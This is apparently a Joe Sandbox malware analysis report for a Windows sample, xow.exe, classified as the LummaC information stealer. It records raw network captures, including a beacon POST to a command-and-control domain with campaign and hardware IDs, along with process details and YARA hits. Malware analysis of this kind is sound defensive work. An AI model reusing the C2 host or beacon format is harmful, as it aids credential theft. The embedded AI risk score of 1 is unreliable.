2025-01-22 11:24:21 UTC	15331	OUT	Data Raw: 58 43 43 fa 64 a4 fc 48 75 0c 58 4a a1 11 87 a5 87 d2 cd ee ca 1c 85 d7 8c 43 cd 62 89 9e 38 32 66 41 e7 7a e3 27 bd 99 30 a5 36 33 d8 bf c5 28 6a e5 3b 36 ca d3 7b c3 63 80 64 cf f8 29 7a d2 da 55 26 c8 7b 0f 79 6e e8 69 04 f9 a7 80 9d 27 bf 6a b6 d2 46 86 a7 c5 f8 f6 90 f1 4b 4b 8b 10 47 01 fc 01 ce 73 c9 ed 53 af 9a bf c8 31 60 7f af f9 9e 9e a0 a9 99 73 91 19 73 1f 35 91 78 7f 52 ba e3 77 3c 8a d8 fc ac fa e7 7a 93 14 43 99 d3 76 87 68 16 f8 63 ad f1 2c 01 55 fb 97 6d f3 57 c5 fa c0 bd ec e1 54 a7 55 d2 48 03 6a ec 32 b0 88 a6 e2 67 f0 cb 92 bf 8a 88 67 9c ec 67 e4 87 14 d2 ac a8 d9 70 fc 60 34 eb 81 07 4d 05 55 63 14 e1 7d d5 73 0b 3f 76 39 bf 55 1b f4 4a 85 4a 2f 5e c8 76 55 ac be 3a 77 98 69 5c 5b cd 2b d3 71 0d 65 5a c2 d3 45 72 42 1a e4 d4 ef e4 Data Ascii: XCCdHuXJCb82fAz'063(j;6{cd)zU&{yni'jFKKGsS1`ss5xRw<zCvhc,UmWTUHj2gggp`4MUc}s?v9UJJ/^vU:wi\[+qeZErB
2025-01-22 11:24:21 UTC	15331	OUT	Data Raw: 0e 7e e8 57 e0 e0 a0 f6 c3 70 0a ad af 35 22 dd e7 a1 63 6f 56 66 e7 6e 59 0f 4b 0b b7 9e f1 66 3a 70 1e 09 7e 57 8d 19 75 1e f9 47 a9 92 bd 3e 75 69 0e eb 33 48 bb d9 3a 64 f6 e0 30 f7 ee 5e 81 3c 5d 04 f6 91 11 89 eb 7c 99 a1 f6 41 ee 28 07 c6 4e 83 6c dd 21 ff 6b c2 60 e1 ac 20 58 0e 63 ef 04 0e 7d e2 76 c6 10 41 3f 87 55 b3 cf d7 ef 0d 38 8b 99 ae 1f 10 72 8c b0 dc 08 d9 f5 10 4c ec 38 36 84 63 5d cc f8 d7 ee 2b 95 c3 a4 af b2 3e 93 3a 7a ed b2 e3 1f 09 b3 83 a1 af 89 e4 49 7f e9 d8 8a e8 03 a8 e2 59 ff 58 37 79 83 1f 7b de 9a e0 0b c3 ac 95 41 32 59 5b f9 e6 3f 19 6f a4 25 5e e5 3e 1a 6d 66 3d 8b 6b bf a3 f7 09 95 77 42 be 48 a2 3d e9 8b ba aa a2 de fc 5d 00 c4 e0 e6 30 e2 26 55 3e d1 3b f4 b8 27 b7 80 26 60 2f 17 f8 72 04 f3 02 79 74 3b d0 be 97 a6 Data Ascii: ~Wp5"coVfnYKf:p~WuG>ui3H:d0^<]\|A(Nl!k` Xc}vA?U8rL86c]+>:zIYX7y{A2Y[?o%^>mf=kwBH=]0&U>;'&`/ryt;
2025-01-22 11:24:21 UTC	15331	OUT	Data Raw: 1c 5c f0 cc 5f be a4 bf 23 8a fc d8 15 55 68 9c c1 c8 bb 82 bb 93 b8 3b b3 27 7a a9 0d 00 01 59 28 0c 15 91 0b 03 bc 19 31 7a 3f 1a 41 64 32 9c 20 e6 86 93 8d f8 f1 be fe d7 7e 59 88 7c 43 b0 67 eb 7f 45 c8 ff eb a6 8c e3 1c e5 69 0e 80 f2 4d 1e 76 9e 3b 9b d3 4e 41 b1 c8 9f 1f 3c 9c 29 bb 99 e7 43 a4 d4 3e 6c cd bc c6 0b 0e ab f3 c1 08 90 71 7d 4d 87 f4 5f fb 21 21 16 8f e5 3a ba dd ea 37 27 b5 b5 f9 f8 db 83 3a ab 92 33 41 79 42 a3 58 70 16 b2 e7 02 66 ab 08 2d 97 1b 32 90 32 bd 88 b4 0f e7 8f 10 9e ba e6 a7 06 9c d1 2b d7 26 7a 2b 91 5b f2 73 28 d0 a5 17 31 34 3e 40 6e bf 98 d9 18 21 34 76 fa 4a 1a 24 25 78 04 ce b1 30 fa 8c a4 2b 0a 24 f6 87 1f bd 70 02 54 73 8d 5e e4 bb 07 dd f5 94 78 72 38 0c 19 26 8a 73 fd b3 f6 d5 7a 40 b8 00 6b 3b 18 aa ca 87 6c Data Ascii: \_#Uh;'zY(1z?Ad2 ~Y\|CgEiMv;NA<)C>lq}M_!!:7':3AyBXpf-22+&z+[s(14>@n!4vJ$%x0+$pTs^xr8&sz@k;l
2025-01-22 11:24:21 UTC	15331	OUT	Data Raw: 84 81 66 b7 10 29 7e 53 ec 27 ac d3 e5 85 cb ac 47 f6 c5 dd 6b b2 6d 56 c6 fb f7 e3 73 df c0 92 ce c9 7b c0 c8 18 c0 cb f2 4c 77 6b 40 70 65 62 f7 6f a7 b1 9a 4c 89 c2 dc 63 b0 38 ff a5 d4 fd f8 63 b0 bf 52 29 2e 18 59 8a d4 66 e9 87 55 ce 9c 9e 26 5b 62 e7 8f d6 2b 62 9b 18 d9 99 a5 f1 80 c7 c9 89 73 98 65 84 d0 3c 8c b9 fe ec 30 bb 48 c5 53 d3 97 73 82 fd 3d 90 a2 f9 11 b4 35 06 77 2d 37 55 cf f0 ec 5b 32 7f 6b 9e 84 c4 23 a8 da 7b 70 b8 24 15 53 85 f4 30 fd 16 54 89 40 c3 90 52 c0 cc e8 0f 57 ae e3 19 87 ec 90 8c d1 a2 24 1d e5 e0 45 4e 11 13 7b 7c 18 d3 15 43 c5 ef ed b7 e5 8c 43 b5 0a 95 4f 49 e3 7a 30 68 b7 4e 0b c6 6f 75 d2 ac f0 15 8b f4 27 51 11 20 e3 ef 73 7f 89 b0 4a 31 20 f0 a2 38 1e c2 53 49 76 41 ca 8e 9f aa 04 4b 51 7b 10 f7 3c 9c d9 e9 35 Data Ascii: f)~S'GkmVs{Lwk@peboLc8cR).YfU&[b+bse<0HSs=5w-7U[2k#{p$S0T@RW$EN{\|CCOIz0hNou'Q sJ1 8SIvAKQ{<5
2025-01-22 11:24:21 UTC	15331	OUT	Data Raw: 21 1e d5 20 9a c3 70 fb b7 28 3c 72 b1 5c 07 ce f7 5e be 08 9b 21 80 94 4e 5d 6e 4a 56 ce fa a4 cd 68 85 11 67 27 3a c4 48 35 26 5f 42 ca b1 01 12 95 f2 47 a0 f6 93 42 0c b6 bf 5e 32 14 2a b8 f5 3a 9e 66 ab 03 20 4e c2 67 ce 72 5f 6e e8 fa 77 fb 04 69 60 59 3d fd 98 1f cc e9 c3 06 94 40 f0 21 24 05 62 0c 47 89 80 c6 22 ca 5e dd de 0f 2e e4 92 a5 f7 ef da bf ae da 3d b0 1b 1e 1a 80 b1 06 bc 5b cf 78 d4 6c 4e 00 20 97 0d 96 a2 e4 1f 1b bd bb 71 8b 13 e8 72 95 62 35 9c 4a 02 45 69 c3 33 4d 79 1f 75 4c 48 68 9e 1b 02 5e c3 3a 16 1e 2e b3 1f b9 d8 05 83 5e e3 22 a4 c5 8c c0 e8 d4 bb ab ed 7b e3 d4 47 b2 e4 10 77 7d 2c a9 19 41 ad 3f 44 78 5a 7a 65 5f f0 06 ac aa 67 43 e0 58 14 e5 7f 9d 90 e7 e4 44 fe 77 19 e9 89 0e 14 24 0b c9 01 5a 3b 7c f7 d4 b0 60 af 28 ad Data Ascii: ! p(<r\^!N]nJVhg':H5&_BGB^2*:f Ngr_nwi`Y=@!$bG"^.=[xlN qrb5JEi3MyuLHh^:.^"{Gw},A?DxZze_gCXDw$Z;\|`(
2025-01-22 11:24:21 UTC	15331	OUT	Data Raw: dc 62 77 f8 f9 d3 c0 1c d4 16 3d fc ea 63 33 aa 4a 53 4c 38 a0 de a7 0b 8c 7e ed 0e 5a 09 58 c4 ad ea 7c 1d 14 08 09 0f 5f 18 1c f2 41 b0 a1 1e a5 d2 e2 65 b7 39 99 8a 32 5e 8d 4f c6 64 51 c3 58 37 25 f5 e7 66 d5 fc 74 0c 87 e9 66 bc 78 71 8a 39 dd 72 17 01 8c 4d d2 83 7e 2c 5e df 7a 65 c4 8b 46 ea 87 b3 fb 4b be 66 f6 eb c7 62 0f 50 55 d8 63 87 d3 4f 7f 64 7a bc 0f e9 68 83 6e 6f 26 ff 14 b2 64 cd 24 f3 97 bc 37 71 4f b5 3e a1 46 bf 7f f9 d1 f0 13 d0 52 79 78 e3 1f bb c7 e9 f9 e7 84 58 c3 7b a0 ed ec de aa 69 3e 45 d9 8d 39 c3 0d 19 db 15 3b 8d 02 f3 45 dd 97 9d 17 9d 56 75 63 b8 9b 39 43 45 09 ac 2d 1d 21 b2 2b e9 70 d5 c3 6a ce 19 e8 95 ff fa c6 50 c8 15 70 b0 ac ba cd 9b 3d fd f0 40 6e 4d e7 9a 0e 27 af d2 46 73 64 70 f4 cb 01 d0 4e b1 04 a7 42 6c 08 Data Ascii: bw=c3JSL8~ZX\|_Ae92^OdQX7%ftfxq9rM~,^zeFKfbPUcOdzhno&d$7qO>FRyxX{i>E9;EVuc9CE-!+pjPp=@nM'FsdpNBl
2025-01-22 11:24:21 UTC	15331	OUT	Data Raw: 29 0c a2 36 4b 3e 85 db bd 9b 4b 64 24 8e 89 cf e9 8b 84 ae 71 9c a5 c1 ba 9b 3a 20 aa 10 98 13 eb 59 7b 6d dd 04 24 04 10 b2 a7 cf b2 4d fc a0 d2 bb 58 9f a7 e9 d2 b7 1d 2c 33 9c b2 8d 84 85 61 9b e1 aa a8 90 b3 df aa 2f 3f 50 0a f7 dc 2c 49 20 a3 a3 0d 78 62 e2 2e 26 6f 9a 19 a3 c2 8c 8d 10 39 ec a5 ea 14 4c a3 5e 81 45 68 d0 53 f5 cd 46 ed c3 cc 26 c1 11 13 92 b9 76 d3 72 9b 9a b6 2a 23 95 97 3d 4f 25 60 1e 62 0b a4 43 dd 3f 25 17 24 ea 80 19 83 11 4e 05 d3 18 39 77 80 6c ac a8 3f 25 66 89 8e 2c c3 88 0b bf 54 84 71 9b ed 90 9e 5a 81 2d a4 d2 17 96 ba 26 93 e9 ac f7 5e 93 b1 07 db 38 4a 89 5f 3e b0 7e 77 48 4c 08 ed f7 fb 50 07 20 a6 85 5f 8c fc 9a a8 9d 84 26 ca 23 3b 3a 28 52 2e c4 9f f4 c2 a5 ba 83 c8 80 c7 90 55 63 b6 ce d6 e9 7b 14 33 f3 9f 6f 12 Data Ascii: )6K>Kd$q: Y{m$MX,3a/?P,I xb.&o9L^EhSF&vr*#=O%`bC?%$N9wl?%f,TqZ-&^8J_>~wHLP _&#;:(R.Uc{3o
2025-01-22 11:24:21 UTC	15331	OUT	Data Raw: c9 37 a2 a6 76 7a f4 e4 b8 3e f3 a5 ec 13 85 d1 00 bf d1 10 15 e1 be 13 41 f5 91 4f b9 cb a4 10 7d 66 84 25 32 24 b1 9b d1 37 bc b6 93 c6 f4 cd e0 44 1c 70 7d db 58 7b be e0 1d 43 3f a4 ec 14 7b 70 d1 fd 56 89 b9 ec 71 93 2f 0d ef ef 66 dd 9a 31 2c 08 c0 e7 75 4e 9b 63 16 3e d9 91 cf db e4 26 d4 3c 15 1c da 68 90 1a ee 33 6c 70 c3 2f cc e3 59 f7 48 32 7e f6 15 96 16 c1 6e fe b0 96 c9 ca 1f 39 b5 13 c4 8f 7e 86 a8 44 86 46 d1 0e a1 06 3e 70 13 fa 0b fe 1c fc cf 7d 16 1b af 1c 34 e1 f1 8e 95 bf 4d 4e c3 48 c8 4c 1a 65 1a 40 a7 be 9f 33 99 60 71 0d e7 6e 24 b3 17 15 c0 23 93 a7 bb 43 44 15 e1 e4 b5 9f 80 e0 e6 30 6c 76 b7 a1 01 0d 27 06 1b 8d 55 47 f7 17 63 fc b8 4a d6 35 25 48 4c 70 cf 93 35 66 12 f2 21 b8 48 fd 55 b5 dc 2c 81 65 87 1b 9e d6 34 09 88 97 2d Data Ascii: 7vz>AO}f%2$7Dp}X{C?{pVq/f1,uNc>&<h3lp/YH2~n9~DF>p}4MNHLe@3`qn$#CD0lv'UGcJ5%HLp5f!HU,e4-
2025-01-22 11:24:22 UTC	1136	IN	HTTP/1.1 200 OK Date: Wed, 22 Jan 2025 11:24:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=flshm9umqh03skliesh1kqn7ar; expires=Sun, 18 May 2025 05:11:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dIzH6e3wqYcOH%2FBSyr186lJBdgzg4XFhC0kHuL57kgfT9KjIdRE7ee8bEbMUiITP%2FmHpF4w1aNjJbXPTS8d0k0jsNjZoMrH3v12LKdNYBIIr7Z48VoFDsiTey8d4C7%2F3IMcFLQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 905f2d586edc82ce-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7135&min_rtt=7125&rtt_var=2693&sent=202&recv=605&lost=0&retrans=0&sent_bytes=2843&recv_bytes=589794&delivery_rate=405049&cwnd=32&unsent_bytes=0&cid=ef3adacdda91c219&ts=1862&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	104.21.78.5	443	7392	C:\Users\user\Desktop\xow.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:24:23 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 81 Host: jarry-fixxer.bond
2025-01-22 11:24:23 UTC	81	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 52 49 49 49 26 6a 3d 26 68 77 69 64 3d 39 34 33 34 41 39 32 45 38 33 30 31 36 30 35 45 37 39 46 45 37 41 41 35 35 31 34 37 43 36 43 30 Data Ascii: act=get_message&ver=4.0&lid=c2CoW0--RIII&j=&hwid=9434A92E8301605E79FE7AA55147C6C0
2025-01-22 11:24:23 UTC	1134	IN	HTTP/1.1 200 OK Date: Wed, 22 Jan 2025 11:24:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rl7rvibqh6sdde5184euon0gud; expires=Sun, 18 May 2025 05:11:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oubwnBMVgdzoc5ZQ8grNK5Spq%2B%2Bj8tlADSMNo%2F1qwwSQadUMooGKXAa1JP%2BFtlO7hNRMV8oSLJZMcx1mh%2Bs6HFd9ez1jzYVaQoHTodVlp%2BdSvzVHpjlZJiSfhw6lO7h6QyplkA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 905f2d675800829f-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7175&min_rtt=7173&rtt_var=2695&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=982&delivery_rate=405893&cwnd=32&unsent_bytes=0&cid=0cda1fd77da591dd&ts=534&x=0"
2025-01-22 11:24:23 UTC	54	IN	Data Raw: 33 30 0d 0a 47 73 67 78 73 6b 61 33 77 62 7a 78 64 47 67 51 4b 36 51 54 2f 30 55 37 35 42 31 44 53 74 5a 69 39 2b 6b 52 38 5a 61 42 39 4e 68 42 6c 51 3d 3d 0d 0a Data Ascii: 30Gsgxska3wbzxdGgQK6QT/0U75B1DStZi9+kR8ZaB9NhBlQ==
2025-01-22 11:24:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	06:23:59
Start date:	22/01/2025
Path:	C:\Users\user\Desktop\xow.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\xow.exe"
Imagebase:	0x7f0000
File size:	1'450'496 bytes
MD5 hash:	319C0C96D2317EADF4271F5149EDEA3A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1734036576.0000000006300000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1710337843.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:24:00
Start date:	22/01/2025
Path:	C:\Users\user\Desktop\xow.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\xow.exe"
Imagebase:	0x130000
File size:	1'450'496 bytes
MD5 hash:	319C0C96D2317EADF4271F5149EDEA3A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report xow.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
xow.exe